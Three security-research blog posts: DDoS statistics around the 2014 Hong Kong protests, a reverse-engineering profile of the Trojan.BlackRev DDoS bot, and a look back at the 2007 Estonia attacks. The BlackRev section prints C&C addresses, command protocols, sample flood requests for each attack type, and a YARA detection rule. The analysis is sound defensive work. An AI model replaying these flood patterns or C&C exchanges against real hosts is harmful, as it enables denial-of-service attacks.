DDoS Activity in the Context of Hong Kong’s Pro-democracy Movement

By: Kirk Soluk

In early August, we examined data demonstrating a striking correlation between real-world and online conflict [1], which ASERT tracks on a continual basis [2-7]. Recent political unrest provides another situation in which strong correlative indicators emerge when conducting time-series analysis of DDoS attack data.

The latest round of pro-democracy protests in Hong Kong began on September 22nd when “. . . Students from 25 schools and universities go ahead with a week-long boycott to protest Beijing’s decision to proceed with indirect elections for Hong Kong’s Chief Executive position.” [8]. The protests ramped up on September 28th when a larger pro-democracy group, Occupy Central with Love and Peace, combined forces with the student demonstrators [8-9]. On October 1st, protesters vowed to increase the level of civil disobedience if Hong Kong’s Chief Executive, Leung Chun-Ying, did not step down [10]. Since that time, tensions have increased, with police crackdowns, tear gas, barricades, skirmishes, shutdowns of government buildings and infrastructure, and heavy use of social media to promote both pro- and anti-protest sentiment. By examining Arbor ATLAS Internet-wide attack visibility data we have identified DDoS attack activity in the APAC region which correlates strongly with the ebb and flow of protest activity in Hong Kong.

Arbor’s ATLAS Initiative

The DDoS information provided in the remainder of this report is derived from Arbor’s ATLAS Initiative. Arbor ATLAS receives anonymized Internet traffic and DDoS event data from over 290 ISPs worldwide which have deployed Arbor’s DDoS Mitigation solutions.  While many observed events are symptomatic of attacks during this period, it is important to note that we cannot definitively identify the motivations behind any given event.

Hong Kong as a Target of DDoS Attacks (September-October)

Number of Observed DDoS Attacks

The following graph illustrates that the number of observed DDoS attacks targeting Hong Kong-related online properties more than doubled between September and October, from 1,688 discrete attacks in September to 3,565 attacks in October:

Figure 1: Total Number of Attacks Targeting Hong Kong (September and October, 2014)

Although the sheer number of DDoS attacks increased significantly from September to October, there was not a significant difference with respect to other attack attributes such as size or duration.  For example, the following charts break out the percentage of DDoS attacks within a given size range for both September and October, along with the raw number of DDoS attacks in that size range:

Figure 2: Percentage of Attacks within a given Size Range

Overall, the percentage of DDoS attacks within a given size range remained fairly consistent from September to October, with the biggest difference being a relative 4% decrease in the number of DDoS attacks within the 2 Gbps to 5 Gbps range.

In summary, the analysis of the number and size of Hong Kong-related DDoS attacks depicted in Figures 1 and 2 above can be summed up by stating that “October saw more of the same – a lot more!”

Size of Attacks and Related News Events

Figure 3 illustrates the largest DDoS attacks per day, in terms of bandwidth, targeting Hong Kong-related online properties during the month of October:

Figure 3: Peak Attack Sizes per Day (Gbps)

Three large DDoS attacks on October 14th (45.4 Gbps), 17th (38.3 Gbps), and 19th (45.6 Gbps) stand out. The total number of observed DDoS attacks targeting Hong Kong-related online properties (289, 419, and 427 respectively) also peaked on these days. Since the vast majority of DDoS events reported via ATLAS are anonymized, it cannot be definitively determined how these specific DDoS attacks were related to the ongoing protests. However, these attacks coincide with reports on Twitter and by the Wall Street Journal of anti-protest crowds attempting to physically prevent pro-democracy newspaper publisher Apple Daily from distributing its newspapers. Specifically, the Journal noted that Apple Daily “simultaneously faced a cyberattack that brought down its email system for hours” [11]. On October 14th, Computerworld Hong Kong quoted an employee of Next Media (Apple Daily’s parent company) as follows: “The network was a total failure, affecting not just Apple Daily, but all the publications under Next Media” [12].

What’s Next?

Based on in-region DDoS attack statistics for the first week of November, DDoS attacks on Hong Kong-related Internet properties appear to be continuing. The following graph illustrates peak DDoS attack sizes of 30 Gbps or more on four consecutive days (November 3rd – 6th):

Figure 4: Peak Attack Sizes per Day (Gbps) in the first week of November

Conclusion

While establishing definitive causal relationships and attribution is challenging, it is apparent that DDoS attacks have become the ‘new normal’ during periods of political unrest worldwide. In this case, we observed a 111% increase (1,688 to 3,565) in the number of DDoS attacks targeting Hong Kong-related Internet properties when comparing the months immediately before and after the protesters’ October 1st demand that Hong Kong’s Chief Executive step down. Additionally, large-scale DDoS attacks were observed targeting Hong Kong-related Internet properties that coincide with reports of debilitating disruptions of online media outlets sympathetic to the protest movement.

References

[1] http://www.arbornetworks.com/asert/2014/08/ddos-and-geopolitics-attack-analysis-in-the-context-of-the-israeli-hamas-conflict/

[2] http://www.arbornetworks.com/asert/2007/12/political-ddos-ukraine-kasparov/

[3] http://www.arbornetworks.com/asert/2013/05/estonia-six-years-later/

[4] ASERT Threat Intelligence Brief 2013-5: Observed Syrian Cyber Adversary Capabilities and Indicators. Available to Arbor customers upon request.

[5] ASERT Threat Intelligence Brief 2013-7: The Impact of Protest Activity on Internet Service in Thailand. Available to Arbor customers upon request.

[6] ASERT Threat Intelligence Brief 2013-4: Potential Targeted Attacks Against Various International Interests. TLP Amber. Available to Arbor customers upon request.

[7] ASERT Threat Intelligence Brief 2014-04: Counter Terrorism Expo and Bulgarian State Agency for National Security Cyber-Threat Alert. TLP Amber. Available to Arbor customers upon request.

[8] http://www.theepochtimes.com/n3/1015132-hong-kong-occupy-central-time-line-of-key-umbrella-movement-events/

[9] http://www.scmp.com/topics/occupy-central

[10] http://www.reuters.com/article/2014/10/01/hongkong-china-idUSL6N0RV5F920141001

[11] http://online.wsj.com/articles/hong-kongs-press-under-siege-1413330960

[12] http://cw.com.hk/news/next-media-under-cyberattack-and-operations-disruption

The Revolution Will Be Written in Delphi

By: Dennis Schwarz

Since it has been a little while since we profiled a DDoS botnet family on the blog, let’s take a look at Trojan.BlackRev (also known as the “Black Revolution” trojan). It was named after the mutex set by early versions of the malware. This family is interesting from a research perspective because there are at least four revisions in the wild showing its progression from a basic DDoS bot to a more advanced one.

Rev   MD5                                C&C URL                               C&C IP
1     06d8da1e14cff81ca2fad02d2a878c72   http://userhaos.ru/113/bot/gate.php   91.105.232.105
2     c9c6aeacee9f973ca0ca5da101a12a16   http://ergoholding.ru/rev/gate.php    91.204.122.100
2.5   7141cacc3f4a191015a176947a403b79   http://clfrev.ru/rev/panel/gate.php   93.170.130.112
3     eae553d72142f9dcb06c5c134015fe7a   http://ergoholding.ru/ddd/gate.php    91.204.122.100

The programming language used is Delphi (networking support via the Synapse library); PEiD detects it as version “6.0 – 7.0” and the Interactive Delphi Reconstructor (IDR) confirms version 7.

As an aside, the latter tool’s IDC Generator helped significantly in reverse engineering these binaries in IDA Pro, thanks much!

Based on the use of Delphi, the command and control locations, and the language references in some of the HTTP headers (the ru-RU Accept-Language and the windows-1251 charset), the family appears to be of Russian origin. But, as with all malware attribution, this is highly speculative. It is also unclear whether a single threat actor holds the source code or whether the code has been released or leaked and multiple actors are making modifications.

Revision 1

Revision 1’s command and control (C&C) is HTTP-based. Bots register to the C&C using a request like this:

GET /113/bot/gate.php?reg=lemaaapuzg HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The reg parameter value is set to 10 random lowercase letters.

Here is how bots poll for commands:

GET /113/bot/gate.php?cmd=urls HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C will respond with a “|” delimited message:

command|unknown_integer|unknown_integer2|target|query string or port|

Identified commands:

  • stop – stop attack
  • die – terminate bot process
  • sleep – sleep for one hour
  • http – HTTP GET request flood #1
  • simple – HTTP GET request flood #2
  • loginpost – HTTP POST request flood #1
  • datapost – HTTP POST request flood #2

The following DDoS attacks are implemented in this revision.

Attack – http

A HTTP GET request flood. Here is a sample request:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie: PHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

The Keep-Alive header will be set to a random integer between 0 and 300. The rest of the headers are static.

Attack – simple

A barebones HTTP GET request flood. It uses Synapse’s default GET request and looks like this:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – loginpost

A HTTP POST request flood. The POST request will look like:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 25

login=gxt1$pass=svw3re1aq

The login and pass parameters are separated by the “$”. Both values are set to random lowercase letters and digits. The lengths will be chosen randomly between 0 and 15 characters each.

Attack – datapost

A HTTP POST request flood. A sample request:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 895

r8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs
jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsj

For the POST data, a string of lowercase letters and digits is generated. The length will be randomly chosen between 0 and 150. This string will then be repeated 179 times.

Revision 2

Revision 2 of Trojan.BlackRev modifies the C&C communications slightly. The reg parameter is set to 15 random upper- and lowercase letters, and the bot uses the following User-Agent:

User-Agent: Mozilla/4.0 (SEObot)

The following layer 4 attack commands were added:

  • syn – TCP connection flood
  • udp – UDP flood #1
  • udpdata – UDP flood #2
  • data – TCP flood
  • icmp – ICMP echo request floods

This revision implements revision 1’s http, simple, loginpost, and datapost attacks with the only difference being that in the latter three, the User-Agent used is:

User-Agent: Mozilla/4.0 (SEObot)

The following are the details of the additional DDoS attacks.

Attack – syn

Despite the name, this is not a raw TCP SYN flood: behind the scenes the bot opens complete TCP connections, three-way handshake included, so what is implemented is a connection flood. A practical consequence is that the source addresses cannot be spoofed, so the attacking bots show up directly in the target’s connection logs.

Attack – udp

A UDP flood where the payload is 16 “F”s.

Attack – udpdata

A UDP flood where the payload is 100 random lowercase letters.

Attack – data

A TCP flood. For the payload, a string of random lowercase letters with a random length of 0 to 100 is generated. This string is repeated 172 times. The concatenated string is then repeated again 35 times.

Attack – icmp

An ICMP echo request or Ping flood. The payload is 44 “7”s.

Revision 2.5

C&C-wise, revision 2.5 is very similar to revision 2. It changes the following commands:

  • http
  • udp
  • udpdata
  • data

This revision adds:

  • tcpdata – TCP flood #1
  • dataget – HTTP GET request flood
  • connect – TCP flood #2
  • dns – resolve IPs

Attack – http

Example request:

GET /index1.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 176
Connection: keep-alive
User-Agent: Android-x86-1.6-r2 - Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: https://www.google.ru/#hl=ru&gs_rn=9&gs_ri=psy-
ab&tok=TBFEIC6g9ZD8TLHI_O_qEw&cp=5&gs_id=i&xhr=t&q=www.victim1.com&es_nrs=true&pf=p&newwindow=1
&safe=off&output=search&sclient=psy-
ab&oq=site.&gs_l=&pbx=1&bav=on.2,or.r_cp.r_qf.&bvm=bv.45175338,d.bGE&fp=364d6440e7471a0b&biw=
1360&bih=624
Cookie: PHPSESSID=66lf4vv9l8W7engCw6hFmLWShuKAMMuqJICAxiLekLrmAnnmiJ

The Keep-Alive header will be set to a random number between 0 and 300. The Cookie header will be set to “PHPSESSID=” followed by 50 random characters drawn from uppercase letters, lowercase letters, and digits. This revision selects a random User-Agent out of the following 11 possible:

  • Yandex/1.01.001 (compatible; Win16; I)
  • Yandex/1.01.001 (compatible; Win16; P)
  • Yandex/1.02.000 (compatible; Win16; F)
  • Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
  • Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
  • StackRambler/2.0 (MSIE incompatible)
  • StackRambler/2.0
  • Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
  • Samsung Galaxy S – Mozilla/5.0 (Linux; U; Android 2.1-update1; ru-ru; GT-I9000 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko)
  • Samsung Galaxy Tab 10.1 Android 3.1 – Mozilla/5.0 (Linux; U; Android 3.1; en-us; GT-P7510 Build/HMJ37) AppleWebKit/534.13 (KHTML, like Gecko)
  • Blackberry OS ?? 4.2 ?? 5 ?????? ? BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179

The rest of the headers are static, including the very specific Referer. Note that several of the User-Agent entries carry a descriptive label ahead of the actual User-Agent string (“Android-x86-1.6-r2 –”, “Samsung Galaxy S –”), apparently copied along with the strings from a reference list, and the BlackBerry entry contains mis-encoded (likely Cyrillic) text. No genuine browser sends those prefixes, which makes them a convenient detection anchor.

Attack – udp

The UDP payload is interesting. It is 76 bytes in length, and looks like tcpdump output:

[udp sum ok] 60865 FormErr% [0q] 0/0/0 (12) (DF) (ttl 253, id 9987, len 40)

ASERT team member Matt Bing speculated that it might have been copied and pasted from the tcpdump output in a 2005 article titled “Understanding the UDP Protocol”.

Attack – udpdata

The payload in this variant is 342 “F”s.

Attack – tcpdata

This is a new attack, a TCP flood. The payload is generated like this: a string of 100 random lowercase letters is generated. This string is repeated 172 times. Then, the concatenated string is repeated 35 times.

Attack – data

The data command was changed to launch both the udpdata and tcpdata attacks.

Attack – dns

Repeatedly tries to resolve the target IP via gethostbyaddr() function calls.

Attack – dataget

A new HTTP GET request flood. Example request:

GET /index10.html?
xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u17k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27
jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd005s5hpwerv1=xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u1
7k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd00
5s5hpwerv1$....more of the same... HTTP/1.1
Host: www.victim10.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (SEObot)

The query string is quite long; it is constructed like this: a string of 150 random lowercase letters and digits is generated and used as both name and value for 18 name/value pairs. At the end, one more name/value pair is added whose value is the random string repeated 53 times. The name/value pairs are separated by a “$” rather than the usual “&”.

Attack – connect

A new attack, a TCP flood. On each send() iteration a string of 10 random lowercase letters is generated and appended to the previously generated string. A newline is concatenated to the end.

Revision 3

Revision 3 changes things up a bit. The analyzed binary phones home to the same C&C domain and IP as revision 2, but bot registration now looks like this:

GET /ddd/gate.php?id=idbucwehjhhgjjxxe HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The id parameter will be set to “id” plus 15 random lowercase letters.

Commands in this revision are polled via:

GET /ddd/get HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C response is still pipe delimited, but different:

command|number_of_packets_to_send|URL, IP, hostname, or stop

There are some deletions, additions, and changes to the command set.

Commands removed:

  • die
  • sleep
  • syn
  • udpdata
  • tcpdata
  • data
  • dataget
  • connect

Commands added:

  • exec – download and execute
  • resolve – hostname resolution flood
  • antiddos – HTTP GET request flood — favicon.ico
  • range – HTTP GET request flood — Range header
  • ftp – FTP connection flood
  • download – HTTP GET request flood
  • fastddos – HTTP GET request flood — WinInet functions
  • slowhttp – HTTP GET request flood — possible Slowloris attempt
  • allhttp – launches multiple HTTP floods
  • full – launches multiple floods

Commands changed:

  • http
  • simple
  • loginpost
  • datapost
  • udp

Commands that stayed the same:

  • icmp
  • dns

Below are revision 3’s attacks.

Attack – http

The http attack changed. It is now an HTTP GET and POST flood. The GET request:

GET /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html

And the POST:

POST /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html
Content-Length: 87664

In both, the Keep-Alive header will be set to a random number between 0 and 300. In the POST, the Content-Length header is set to a random number between 0 and 300,000.

Attack – simple

The simple attack is slightly different:

GET /index.html HTTP/1.1
Host: www.victim2.com
Connection: close
User-Agent: Opera/9.80

The User-Agent header looks to be a copy and paste typo. This User-Agent is used in some additional attacks as well.

Attack – loginpost

In addition to the below POST request, a simple flood is also started.

POST /index.html HTTP/1.1
Host: www.victim3.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 28

login=g84lkvpk&pass=uOjzq9FJ

Slight differences: the parameters are separated by a “&” instead of a “$”, and the values are each set to eight random letters and digits (the sample value uOjzq9FJ shows that both cases occur).

Attack – datapost

A POST request where the data is 100 random lowercase letters.

POST /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 100

bulwmxcytltvczbrgqoedffycczkyedrmoczlkhgjghmwdnveinkkzgncvtojsxhlchddzebspuwcsdeydalowdcewdxrllgzvvt

Attack – udp

The UDP flood routine no longer uses the Synapse Library in this revision. Winsock is used instead. Port 80 is hardcoded and the payload is only two “F”s.

Attack – resolve

Repeatedly tries to resolve the target hostname via gethostbyname() function calls.

Attack – antiddos

A HTTP GET request flood. Two requests are sent on each iteration, the first one being:

GET /index.html HTTP/1.1
Host: www.victim2.com
Keep-Alive: 150
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The second:

GET /index.html/favicon.ico HTTP/1.1
Host: www.victim2.com
Keep-Alive: 47
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto3e45h4rlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The Keep-Alive header is set to a random number between 0 and 300. In the second request, favicon.ico is appended to the target path rather than requested from the site root, which is why the sample shows /index.html/favicon.ico.

Attack – range

An HTTP GET request flood with a Range header, possibly an attempt at an ARME/Apache Killer style attack. Note, though, that Apache Killer (CVE-2011-3192) relied on a single Range header listing a large number of overlapping byte ranges; a request with one plain range, as here, does not trigger that condition and amounts to just another GET flood. Sample request:

GET /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
Range: bytes=41-73915
User-Agent: Opera/9.80

The Range start value is a random value between 0 and 100. The stop value is a random value between 0 and 100,000.

Attack – ftp

An FTP connection flood. A sample session:

200 OK
USER 7g6jo5ircx
331 password
PASS s1pvu9yx0r
200 OK
TYPE I
200 OK
STRU F
200 OK
MODE S
200 OK
REST 0
200 OK

The USER and PASS will both be set to 10 random lowercase letters and digits.

Attack – download

A basic HTTP GET request flood:

GET /1.exe HTTP/1.0
Host: www.victim7.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – fastddos

An HTTP GET request flood using the WinInet functions:

GET /index.html HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: google
Host: www.victim8.com
Cache-Control: no-cache

Notice the interesting User-Agent.

Attack – slowhttp

An HTTP GET request flood. Possibly an attempt at a Slowloris attack, but it is not slow at sending data, and holding connections open with partial, slowly trickled requests is the whole point of Slowloris. Here’s what the request looks like:

GET /9.html HTTP/1.0
Host: www.victim9.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)‘=

Attack – allhttp

Launches the following attacks:

  • simple
  • http
  • range
  • loginpost
  • download
  • datapost

Attack – full

Launches the following attacks:

  • icmp
  • udp
  • datapost

Miscellaneous

Besides the C&C and DDoS attacks there are some additional differences and features among the revisions:

  • All four revisions spawn a thread that tries to maintain a small memory footprint via calls to SetProcessWorkingSetSize().
  • Revisions 1 and 2.x try to revoke discretionary access control list (DACL) rights to its binary.
  • Revisions 1 and 2.x enumerate a number of directories, then remove files and kill processes based on some tests. The referenced analysis below indicates this might be “botkiller” code.
  • Revision 2.x verifies the embedded C&C by calculating a hash on the URL and comparing it to a hardcoded hash value.
  • Revision 2.x has some built-in monitoring/debugging functionality where the attack commands are echoed back to the C&C via a HTTP GET request to monitor.php.
  • Revision 3 was the first binary to be packed (UPX).
  • Revision 3 maintains persistence via the Registry Run method.
  • The code organization and layout of revision 3 also differs a bit from the other three.

Most of these code paths were glossed over during reversing, and a detailed analysis of them is left as an exercise for any interested readers. There is a Russian-language malware analysis of revision 2 by the “onthar.in Malware Research Laboratory” that takes a closer look at some of the above and also at an associated dropper. It is available at http://onthar.in/articles/black-revolution-ddos-bot-analysis/ (Google Translate does an okay job.)

ASERT has been using the following YARA rule to detect this malware family in our malware zoo. Note that most of the strings are short, common words (“http”, “stop”, “udp”, “range”), so the rule is tuned for triage of an already-suspicious corpus; on a general file population it will match unrelated binaries, and anchoring it additionally on the family’s distinctive User-Agent strings or its gate.php C&C paths would tighten it.

// blackrev
// Dennis Schwarz, Arbor Networks ASERT
// April 2013

rule blackrev
{
    strings:
        $base1 = "http"
        $base2 = "simple"
        $base3 = "loginpost"
        $base4 = "datapost"

        $opt1 = "blackrev"
        $opt2 = "stop"
        $opt3 = "die"
        $opt4 = "sleep"
        $opt5 = "syn"
        $opt6 = "udp"
        $opt7 = "udpdata"
        $opt8 = "icmp"
        $opt9 = "antiddos"
        $opt10 = "range"
        $opt11 = "fastddos"
        $opt12 = "slowhttp"
        $opt13 = "allhttp"
        $opt14 = "tcpdata"
        $opt15 = "dataget"

    condition:
        all of ($base*) and 5 of ($opt*)
}

Conclusion

As we have seen, Trojan.BlackRev is very much a DDoS-specific bot with a rich set of attacks. There are certainly signs that circa April 2013 the code was under active development and the associated campaigns were likely test runs. In addition, the onthar.in analysis notes that they haven’t seen this malware being sold on the underground forums yet. It will be interesting to see how this family will evolve and how active it will become in the wild.

Estonia, six years later

By: Dan Holden

In April 2007, the Estonian government decided to relocate the Bronze Soldier, a Soviet World War II memorial located in Tallinn, as well as the remains of some Soviet WWII soldiers buried nearby.

This decision caused great offense in Russia, starting at the top. Russian president Vladimir Putin said, “I find that this is an absolutely short-sighted policy, extremist-nationalist, which does not take into consideration the history connected with the fight against Nazism or today’s reality.”

Russia’s foreign minister Sergei Lavrov said Estonia had a “blasphemous attitude towards the memory of those who struggled against fascism.”

Within weeks, the country of Estonia was offline, taken down by a botnet-fueled distributed denial of service (DDoS) attack. This attack impacted both the government and the private sector.

The attacks begin….

Within days of the Estonian government decision, a series of sustained DDoS attacks against Estonian Web properties began.

Estonia’s defense minister at the time, Jaak Aaviksoo, told Wired Magazine:

“The attacks were aimed at the essential electronic infrastructure of the Republic of Estonia,” Aaviksoo tells me later. “All major commercial banks, telcos, media outlets, and name servers — the phone books of the Internet — felt the impact, and this affected the majority of the Estonian population. This was the first time that a botnet threatened the national security of an entire nation.”

Two weeks into the attack, Jose Nazario, then a senior security researcher at Arbor Networks, posted a detailed analysis on our blog, writing,

“All in all, someone is very, very deliberate in putting the hurt on Estonia, and this kind of thing is only going to get more severe in the coming years.”

Within the first two weeks, our Internet-wide threat monitoring system, ATLAS, saw at least 128 separate attacks on nine different Web sites in the country, including 35 attacks against the Estonian police, another 35 attacks against the Ministry of Finance and 36 against the Estonian parliament, Prime Minister as well as other general government Web properties.

  • Attack bandwidths ranged from under 10 Mbps to 95 Mbps, with the majority in the 10-30 Mbps range
  • 75 percent lasted no longer than one hour and 5.5 percent, over 10 hours

So does the speculation….

A high profile disagreement between leaders of Estonia and Russia, followed immediately by a cyber-attack against Estonian Web sites? Well, that can only mean one thing, CYBERWAR!!!

Headlines from May 2007:

Estonia: Ground Zero for World’s First Cyber War?

Estonia hit by ‘Moscow cyber war’

Russia accused of unleashing cyberwar to disable Estonia

Slippery Slopes: Attribution and Semantics

One thing that certainly has not changed since the Estonia incident is that hurried analysis, and attempts at instant attribution, are very rarely accurate.

While the headlines said “cyberwar,” the data we saw at the time said something else: digital attribution, regardless of motive, can be extremely difficult. These attacks, like many before and since, were widely distributed around the world; in fact, many of them originated from the United States and elsewhere. There was significant chatter and sharing of attack tools on Russian-language Web sites.

Arbor’s ATLAS system and subsequent analysis showed signs of Russian nationalism at work, but no Russian government connection. The sources we analyzed from around the world did not show a clear line from Moscow to Tallinn; instead, it was from everywhere around the world to Estonia. Additionally, we noted at the time that targets were high-profile Web properties, not critical national infrastructure.

As so often happens, after the flurry of initial speculation, the facts settle and the truth comes out, and usually with more than a little snark.

Estonia ‘Cyberwar’ Wasn’t

Sadly, this dashes THREAT LEVEL’s hopes of seeing our own made up infowar term on a CNN graphic. Since we put it out a week ago, a few more hyperbolic cyberterror gems have surfaced in the coverage of the Estonia packet floods — The First War in Cyberspace! The Future Of Warfare! (exclamation points added) — but the only writer to adopt our Cybarmageddon! was Bruce Sterling. We’ll let you know if it turns up in his next novel.

There is also a lot of confusion around the term “cyberwar.” What does that mean exactly? One country attacking another seems obvious, but in what respects, what targets, and to what degree? What about when a country leverages experts in the field, as it would with defense contractors, to develop tools and capabilities? Just as there is collaboration between the government and the private sector to develop traditional defense systems and hardware, we must by now realize that the same type of public-private collaboration is happening around the world with regard to cyber capabilities, both defensive and offensive.

I’ll leave the question of what defines a “cyberwar” for others with more patience than I to wax intellectual. What I do know is that geopolitics absolutely shapes the threat landscape and the Internet as we know it today.

Regardless of terminology, we have seen some high profile stories since Estonia. Here are but a few examples that we know about:

April 27, 2007: Attacks on Estonia begin.

Week of June 15, 2008: Ukraine put under DDoS attack due to NATO protests.

August 5, 2008: Three days before Georgia launched its invasion of South Ossetia, the Web sites for OSInform News Agency and OSRadio were hacked. Arbor estimates these attacks were in the 814 Mbps range, significantly larger (at that time) than the Estonian DDoS attacks the year before.

